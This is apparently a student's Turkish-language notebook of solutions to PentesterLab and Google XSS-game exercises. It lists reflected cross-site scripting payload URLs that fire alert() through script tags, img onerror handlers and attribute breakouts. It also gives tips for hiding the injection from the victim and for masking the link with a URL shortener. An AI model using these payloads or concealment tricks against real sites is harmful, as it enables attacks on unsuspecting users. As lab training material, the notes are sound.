Pentester lab

Soru 4 çözüm:
http://192.168.99.100/xss/example4.php?name=<img src=hebele onerror="alert(1)" >

soru 5:



http://192.168.99.100/xss/example5.php?name=<script>$a="Hacker"; document.write($a);</script>

Burada patlıyor. alert i gördü mü:
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
http://192.168.99.100/xss/example5.php?name=<script>$a="Hacker"; document.write($a); alert($a);</script>

soru 8 çözüm: 

http://192.168.99.100/xss/example8.php/aaa"><script>alert("hacker");</script><

ruhu duymaması için:
http://192.168.99.100/xss/example8.php/aaa"><script>alert("hacker");</script><form "

hatta bit.ly/ ile çevir linki dostum.


xss game
1) https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
2) <img src="hebele" onerror="alert(1);">
3) https://xss-game.appspot.com/level3/frame#5'" onerror="alert(1);">
                                            #5' onerror
